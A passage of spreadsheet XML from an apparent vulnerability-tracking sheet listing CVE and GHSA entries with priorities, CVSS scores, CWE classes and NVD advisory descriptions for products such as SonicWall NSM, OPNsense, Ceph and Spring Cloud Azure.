      <c r="Q198" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="R198" s="5" t="inlineStr">
        <is>
          <t>A missing authorization vulnerability in the SonicWall Network Security Manager (NSM) On-Prem Management interface allows a lower-privileged Admin user to escalate privileges to SuperAdmin.</t>
        </is>
      </c>
      <c r="S198" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78328</t>
        </is>
      </c>
    </row>
    <row r="199">
      <c r="A199" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B199" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C199" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-79571</t>
        </is>
      </c>
      <c r="D199" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="E199" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F199" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G199" s="5" t="inlineStr"/>
      <c r="H199" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I199" s="5" t="inlineStr"/>
      <c r="J199" s="5" t="inlineStr">
        <is>
          <t>spring</t>
        </is>
      </c>
      <c r="K199" s="5" t="inlineStr"/>
      <c r="L199" s="5" t="inlineStr"/>
      <c r="M199" s="5" t="inlineStr"/>
      <c r="N199" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O199" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P199" s="5" t="inlineStr"/>
      <c r="Q199" s="5" t="inlineStr">
        <is>
          <t>CWE-284</t>
        </is>
      </c>
      <c r="R199"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S199" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-79571</t>
        </is>
      </c>
    </row>
    <row r="200">
      <c r="A200" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B200" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C200" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80181</t>
        </is>
      </c>
      <c r="D200" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="E200" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F200" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G200" s="5" t="inlineStr"/>
      <c r="H200" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I200" s="5" t="inlineStr"/>
      <c r="J200" s="5" t="inlineStr"/>
      <c r="K200" s="5" t="inlineStr"/>
      <c r="L200" s="5" t="inlineStr"/>
      <c r="M200" s="5" t="inlineStr"/>
      <c r="N200" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O200" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="P200" s="5" t="inlineStr"/>
      <c r="Q200" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="R200" s="5" t="inlineStr">
        <is>
          <t>Apache Allura's webhooks are vulnerable to Server-Side Request Forgery (SSRF).
This issue affects Apache Allura: through 1.20.0.
Users are recommended to upgrade to version 1.21.0, which fixes the issue.</t>
        </is>
      </c>
      <c r="S200" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80181</t>
        </is>
      </c>
    </row>
    <row r="201">
      <c r="A201" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B201" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C201" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81939</t>
        </is>
      </c>
      <c r="D201" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="E201" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F201" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G201" s="5" t="inlineStr"/>
      <c r="H201" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="I201" s="5" t="inlineStr"/>
      <c r="J201" s="5" t="inlineStr"/>
      <c r="K201" s="5" t="inlineStr"/>
      <c r="L201" s="5" t="inlineStr"/>
      <c r="M201" s="5" t="inlineStr"/>
      <c r="N201" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O201" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="P201" s="5" t="inlineStr"/>
      <c r="Q201" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="R201" s="5" t="inlineStr">
        <is>
          <t>A Zip Slip vulnerability in the SonicWall Network Security Manager (NSM) On-Prem file upload and archive processing functionality allows an attacker to extract files outside the intended destination directory using a specially crafted archive.</t>
        </is>
      </c>
      <c r="S201" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81939</t>
        </is>
      </c>
    </row>
    <row r="202">
      <c r="A202" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B202" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C202" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85043</t>
        </is>
      </c>
      <c r="D202" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="E202" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F202" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G202" s="5" t="inlineStr"/>
      <c r="H202" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I202" s="5" t="inlineStr"/>
      <c r="J202" s="5" t="inlineStr"/>
      <c r="K202" s="5" t="inlineStr">
        <is>
          <t>google:chrome</t>
        </is>
      </c>
      <c r="L202" s="5" t="inlineStr"/>
      <c r="M202" s="5" t="inlineStr"/>
      <c r="N202" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O202" s="5" t="inlineStr">
        <is>
          <t>2026-09-03</t>
        </is>
      </c>
      <c r="P202" s="5" t="inlineStr"/>
      <c r="Q202" s="5" t="inlineStr">
        <is>
          <t>CWE-459</t>
        </is>
      </c>
      <c r="R202" s="5" t="inlineStr">
        <is>
          <t>Incomplete cleanup in Network in Google Chrome prior to 152.0.7977.82 allowed a remote attacker to bypass system access restrictions via crafted network traffic. (Chromium security severity: High)</t>
        </is>
      </c>
      <c r="S202" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85043</t>
        </is>
      </c>
    </row>
    <row r="203">
      <c r="A203" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B203" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C203" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86729</t>
        </is>
      </c>
      <c r="D203" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="E203" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F203" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G203" s="5" t="inlineStr"/>
      <c r="H203" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I203" s="5" t="inlineStr"/>
      <c r="J203" s="5" t="inlineStr"/>
      <c r="K203" s="5" t="inlineStr"/>
      <c r="L203" s="5" t="inlineStr"/>
      <c r="M203" s="5" t="inlineStr"/>
      <c r="N203" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O203" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P203" s="5" t="inlineStr"/>
      <c r="Q203" s="5" t="inlineStr">
        <is>
          <t>CWE-307</t>
        </is>
      </c>
      <c r="R203"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S203" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86729</t>
        </is>
      </c>
    </row>
    <row r="204">
      <c r="A204" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B204" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C204" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86840</t>
        </is>
      </c>
      <c r="D204" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="E204" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F204" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G204" s="5" t="inlineStr"/>
      <c r="H204" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I204" s="5" t="inlineStr"/>
      <c r="J204" s="5" t="inlineStr"/>
      <c r="K204" s="5" t="inlineStr"/>
      <c r="L204" s="5" t="inlineStr"/>
      <c r="M204" s="5" t="inlineStr"/>
      <c r="N204" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O204" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P204" s="5" t="inlineStr"/>
      <c r="Q204" s="5" t="inlineStr">
        <is>
          <t>CWE-639, CWE-862</t>
        </is>
      </c>
      <c r="R204"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S204" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86840</t>
        </is>
      </c>
    </row>
    <row r="205">
      <c r="A205" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B205" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C205" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-53581</t>
        </is>
      </c>
      <c r="D205" s="5" t="n">
        <v>9</v>
      </c>
      <c r="E205" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F205" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G205" s="5" t="inlineStr"/>
      <c r="H205" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I205" s="5" t="inlineStr"/>
      <c r="J205" s="5" t="inlineStr"/>
      <c r="K205" s="5" t="inlineStr"/>
      <c r="L205" s="5" t="inlineStr"/>
      <c r="M205" s="5" t="inlineStr"/>
      <c r="N205" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O205" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P205" s="5" t="inlineStr"/>
      <c r="Q205" s="5" t="inlineStr">
        <is>
          <t>CWE-22, CWE-73</t>
        </is>
      </c>
      <c r="R205" s="5" t="inlineStr">
        <is>
          <t>OPNsense is a FreeBSD based firewall and routing platform. Prior to version 26.1.9 of opnsense/core and version 26.4_20 of BE/opnsense/core, a path traversal vulnerability in the NTP configuration module allows an attacker to overwrite arbitrary files on the system as the root user. By manipulating the GPS or PPS serial port parameter, an attacker with access to the NTP configuration can escape the intended directory and force the system to write user-controlled data to any file on the filesystem. Version 26.1.9 of opnsense/core and version 26.4_20 of BE/opnsense/core patch the issue.</t>
        </is>
      </c>
      <c r="S205" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-53581</t>
        </is>
      </c>
    </row>
    <row r="206">
      <c r="A206" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B206" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C206" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-66768</t>
        </is>
      </c>
      <c r="D206" s="5" t="n">
        <v>9</v>
      </c>
      <c r="E206" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F206" s="5" t="inlineStr">
        <is>
          <t>cna@sap.com</t>
        </is>
      </c>
      <c r="G206" s="5" t="inlineStr"/>
      <c r="H206" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I206" s="5" t="inlineStr"/>
      <c r="J206" s="5" t="inlineStr">
        <is>
          <t>sap</t>
        </is>
      </c>
      <c r="K206" s="5" t="inlineStr"/>
      <c r="L206" s="5" t="inlineStr"/>
      <c r="M206" s="5" t="inlineStr"/>
      <c r="N206" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O206" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P206" s="5" t="inlineStr"/>
      <c r="Q206" s="5" t="inlineStr">
        <is>
          <t>CWE-807</t>
        </is>
      </c>
      <c r="R206"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S206" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-66768</t>
        </is>
      </c>
    </row>
    <row r="207">
      <c r="A207" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B207" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C207" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69854</t>
        </is>
      </c>
      <c r="D207" s="5" t="n">
        <v>9</v>
      </c>
      <c r="E207" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F207" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G207" s="5" t="inlineStr"/>
      <c r="H207" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I207" s="5" t="inlineStr"/>
      <c r="J207" s="5" t="inlineStr">
        <is>
          <t>spring</t>
        </is>
      </c>
      <c r="K207" s="5" t="inlineStr"/>
      <c r="L207" s="5" t="inlineStr"/>
      <c r="M207" s="5" t="inlineStr"/>
      <c r="N207" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O207" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P207" s="5" t="inlineStr"/>
      <c r="Q207" s="5" t="inlineStr">
        <is>
          <t>CWE-287</t>
        </is>
      </c>
      <c r="R207" s="5" t="inlineStr">
        <is>
          <t>Improper authentication in Spring Cloud Azure allows an unauthorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="S207" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69854</t>
        </is>
      </c>
    </row>
    <row r="208">
      <c r="A208" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B208" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C208" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82021</t>
        </is>
      </c>
      <c r="D208" s="5" t="n">
        <v>9</v>
      </c>
      <c r="E208" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F208" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G208" s="5" t="inlineStr"/>
      <c r="H208" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I208" s="5" t="inlineStr"/>
      <c r="J208" s="5" t="inlineStr"/>
      <c r="K208" s="5" t="inlineStr"/>
      <c r="L208" s="5" t="inlineStr"/>
      <c r="M208" s="5" t="inlineStr"/>
      <c r="N208" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O208" s="5" t="inlineStr">
        <is>
          <t>2026-08-28</t>
        </is>
      </c>
      <c r="P208" s="5" t="inlineStr"/>
      <c r="Q208" s="5" t="inlineStr">
        <is>
          <t>CWE-494</t>
        </is>
      </c>
      <c r="R208" s="5" t="inlineStr">
        <is>
          <t>Hermes Agent 0.18.2 prior to 0.19.0 contains a supply chain vulnerability in its bundled MCP catalog that allows a remote attacker to execute arbitrary code by compromising a third-party upstream repository referenced via a mutable branch rather than a pinned commit SHA. An attacker who compromises the upstream repository can propagate malicious code to every host that installs the affected catalog entry, with no further action required by the operator.</t>
        </is>
      </c>
      <c r="S208" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82021</t>
        </is>
      </c>
    </row>
    <row r="209">
      <c r="A209" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B209" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C209" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85982</t>
        </is>
      </c>
      <c r="D209" s="5" t="n">
        <v>9</v>
      </c>
      <c r="E209" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F209" s="5" t="inlineStr">
        <is>
          <t>psirt@okta.com</t>
        </is>
      </c>
      <c r="G209" s="5" t="inlineStr"/>
      <c r="H209" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I209" s="5" t="inlineStr"/>
      <c r="J209" s="5" t="inlineStr"/>
      <c r="K209" s="5" t="inlineStr"/>
      <c r="L209" s="5" t="inlineStr"/>
      <c r="M209" s="5" t="inlineStr"/>
      <c r="N209" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O209" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P209" s="5" t="inlineStr"/>
      <c r="Q209" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="R209"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S209" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85982</t>
        </is>
      </c>
    </row>
    <row r="210">
      <c r="A210" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B210" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C210" s="5" t="inlineStr">
        <is>
          <t>CVE-2025-30156</t>
        </is>
      </c>
      <c r="D210" s="5" t="n">
        <v>8.9</v>
      </c>
      <c r="E210" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F210" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G210" s="5" t="inlineStr"/>
      <c r="H210" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I210" s="5" t="inlineStr"/>
      <c r="J210" s="5" t="inlineStr"/>
      <c r="K210" s="5" t="inlineStr"/>
      <c r="L210" s="5" t="inlineStr"/>
      <c r="M210" s="5" t="inlineStr"/>
      <c r="N210" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O210" s="5" t="inlineStr">
        <is>
          <t>2026-08-28</t>
        </is>
      </c>
      <c r="P210" s="5" t="inlineStr"/>
      <c r="Q210" s="5" t="inlineStr">
        <is>
          <t>CWE-327</t>
        </is>
      </c>
      <c r="R210" s="5" t="inlineStr">
        <is>
          <t>Ceph is an open-source distributed storage platform providing object, block, and file storage. In versions prior to 20.2.4 and 19.2.6, the CephX authentication protocol encrypts tickets with AES-128-CBC in an unauthenticated mode that uses a hard-coded initialization vector and no message authentication, allowing an attacker to forge credentials and gain cluster-wide access. Because the ciphertext is malleable and the monitor will encrypt attacker-chosen entity names, an attacker holding one low-privilege key and able to observe CephX traffic can use the monitor as an encryption oracle and splice ciphertext blocks into valid tickets for privileged entities such as Manager, MDS, and OSD. The same lack of authentication also lets an attacker with CephX permissions escalate privileges by flipping a single bit in a service ticket to set its allow_all field to true. This issue is fixed in versions 20.2.4 and 19.2.6.</t>
        </is>
      </c>
      <c r="S210" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2025-30156</t>
        </is>
      </c>
    </row>
    <row r="211">
      <c r="A211" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B211" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C211" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-50093</t>
        </is>
      </c>
      <c r="D211" s="5" t="n">
        <v>8.9</v>
      </c>
      <c r="E211" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F211" s="5" t="inlineStr">
        <is>
          <t>productcert@siemens.com</t>
        </is>
      </c>
      <c r="G211" s="5" t="inlineStr"/>
      <c r="H211" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I211" s="5" t="inlineStr"/>
      <c r="J211" s="5" t="inlineStr"/>
      <c r="K211" s="5" t="inlineStr"/>
      <c r="L211" s="5" t="inlineStr"/>
      <c r="M211" s="5" t="inlineStr"/>
      <c r="N211" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O211" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P211" s="5" t="inlineStr"/>
      <c r="Q211" s="5" t="inlineStr">
        <is>
          <t>CWE-434</t>
        </is>
      </c>
      <c r="R211" s="5" t="inlineStr">
        <is>
          <t>A vulnerability has been identified in Siveillance Control Pro V3.0 (All versions &lt; V3.0.12.2173), Siveillance Control Pro V4.0 (All versions &lt; V4.0.9.2178), Siveillance Control V3.0 (All versions &lt; V3.0.22.2177), Siveillance Control V4.0 (All versions &lt; V4.0.11.2177). A vulnerability in the OIS web module allows an attacker to upload arbitrary files to the server. Successful exploitation of this vulnerability could allow an attacker to gain root access on the host system, potentially leading to a full compromise of the affected OIS environment.</t>
        </is>
      </c>
      <c r="S211" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-50093</t>
        </is>
      </c>
    </row>
    <row r="212">
      <c r="A212" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B212" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C212" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-5706</t>
        </is>
      </c>
      <c r="D212" s="5" t="n">
        <v>8.9</v>
      </c>
      <c r="E212" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F212" s="5" t="inlineStr">
        <is>
          <t>product-security@silabs.com</t>
        </is>
      </c>
      <c r="G212" s="5" t="inlineStr"/>
      <c r="H212" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I212" s="5" t="inlineStr"/>
      <c r="J212" s="5" t="inlineStr"/>
      <c r="K212" s="5" t="inlineStr"/>
      <c r="L212" s="5" t="inlineStr"/>
      <c r="M212" s="5" t="inlineStr"/>
      <c r="N212" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O212" s="5" t="inlineStr">
        <is>
          <t>2026-08-28</t>
        </is>
      </c>
      <c r="P212" s="5" t="inlineStr"/>
      <c r="Q212" s="5" t="inlineStr">
        <is>
          <t>CWE-130</t>
        </is>
      </c>
      <c r="R212" s="5" t="inlineStr">
        <is>
          <t>In Bluetooth Mesh SDK 6.1.4 and earlier, malformed extended advertisements can trigger out-of-bounds writes leading to stack corruption and remote code execution. These messages must come from a device that has already joined the network. Only provisioners supporting extended advertisements may be impacted.</t>
        </is>
      </c>
      <c r="S212" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-5706</t>
        </is>
      </c>
    </row>
    <row r="213">
      <c r="A213" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B213" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C213" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86165</t>
        </is>
      </c>
      <c r="D213" s="5" t="n">
        <v>8.9</v>
      </c>
      <c r="E213" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F213" s="5" t="inlineStr">
        <is>
          <t>cna@vuldb.com</t>
        </is>
      </c>
      <c r="G213" s="5" t="inlineStr"/>
      <c r="H213" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I213" s="5" t="inlineStr"/>
      <c r="J213" s="5" t="inlineStr"/>
      <c r="K213" s="5" t="inlineStr"/>
      <c r="L213" s="5" t="inlineStr"/>
      <c r="M213" s="5" t="inlineStr"/>
      <c r="N213" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O213" s="5" t="inlineStr">
        <is>
          <t>2026-09-06</t>
        </is>
      </c>
      <c r="P213" s="5" t="inlineStr"/>
      <c r="Q213" s="5" t="inlineStr">
        <is>
          <t>CWE-119, CWE-120</t>
        </is>
      </c>
      <c r="R213" s="5" t="inlineStr">
        <is>
          <t>A vulnerability was found in Tenda HG10 300001138. This vulnerability affects the function formURL of the file /boaform/admin/formURL. Performing a manipulation of the argument Keywd/urlFQDN results in buffer overflow. The attack may be initiated remotely. The exploit has been made public and could be used.</t>
        </is>
      </c>
      <c r="S213" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86165</t>
        </is>
      </c>
    </row>
    <row r="214">
      <c r="A214" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B214" s="5" t="inlineStr">
        <is>
          <t>Updated</t>
        </is>
      </c>
      <c r="C214" s="5" t="inlineStr">
        <is>
          <t>GHSA-rgj7-g3m4-5g8c</t>
        </is>
      </c>
      <c r="D214" s="5" t="n">
        <v>8.9</v>
      </c>
      <c r="E214" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F214" s="5" t="inlineStr">
        <is>
          <t>GHSA</t>
        </is>
      </c>
      <c r="G214" s="5" t="inlineStr"/>
      <c r="H214" s="5" t="inlineStr"/>
      <c r="I214" s="5" t="inlineStr"/>
      <c r="J214" s="5" t="inlineStr"/>
      <c r="K214" s="5" t="inlineStr"/>
      <c r="L214" s="5" t="inlineStr">
        <is>
          <t>npm:sharp</t>
        </is>
      </c>
      <c r="M214" s="5" t="inlineStr">
        <is>
          <t>0.35.4</t>
        </is>
      </c>
      <c r="N214" s="5" t="inlineStr">
        <is>
          <t>GHSA, OSV</t>
        </is>
      </c>
      <c r="O214" s="5" t="inlineStr"/>
      <c r="P214" s="5" t="inlineStr"/>
      <c r="Q214" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R214" s="5" t="inlineStr">
        <is>
          <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
        </is>
      </c>
      <c r="S214" s="6" t="inlineStr">
        <is>
          <t>https://github.com/advisories/GHSA-rgj7-g3m4-5g8c</t>
        </is>
      </c>
    </row>
    <row r="215">
      <c r="A215" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B215" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C215" s="5" t="inlineStr">
        <is>
          <t>CVE-2025-9049</t>
        </is>
      </c>
      <c r="D215" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E215" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F215" s="5" t="inlineStr">
        <is>
          <t>security@wordfence.com</t>
        </is>
      </c>
      <c r="G215" s="5" t="inlineStr"/>
      <c r="H215" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I215" s="5" t="inlineStr"/>
      <c r="J215" s="5" t="inlineStr"/>
      <c r="K215" s="5" t="inlineStr"/>
      <c r="L215" s="5" t="inlineStr"/>
      <c r="M215" s="5" t="inlineStr"/>
      <c r="N215" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O215" s="5" t="inlineStr">
        <is>
          <t>2026-09-05</t>
        </is>
      </c>
      <c r="P215" s="5" t="inlineStr"/>
      <c r="Q215" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="R215" s="5" t="inlineStr">
        <is>
          <t>The Nokri – Job Board WordPress Theme theme for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the 'nokri_account_member_permissions' function in all versions up to, and including, 1.6.4. This makes it possible for authenticated attackers, with Subscriber-level access and above, to add new Subscriber users with employer account member permissions, who in turn can escalate privileges by updating the email address of any user, including Administrator users.</t>
        </is>
      </c>
      <c r="S215" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2025-9049</t>
        </is>
      </c>
    </row>
    <row r="216">
      <c r="A216" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B216" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C216" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-12648</t>
        </is>
      </c>
      <c r="D216" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E216" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F216" s="5" t="inlineStr">
        <is>
          <t>3c1d8aa1-5a33-4ea4-8992-aadd6440af75</t>
        </is>
      </c>
      <c r="G216" s="5" t="inlineStr"/>
      <c r="H216" s="5" t="n">
        <v>0.015</v>
      </c>
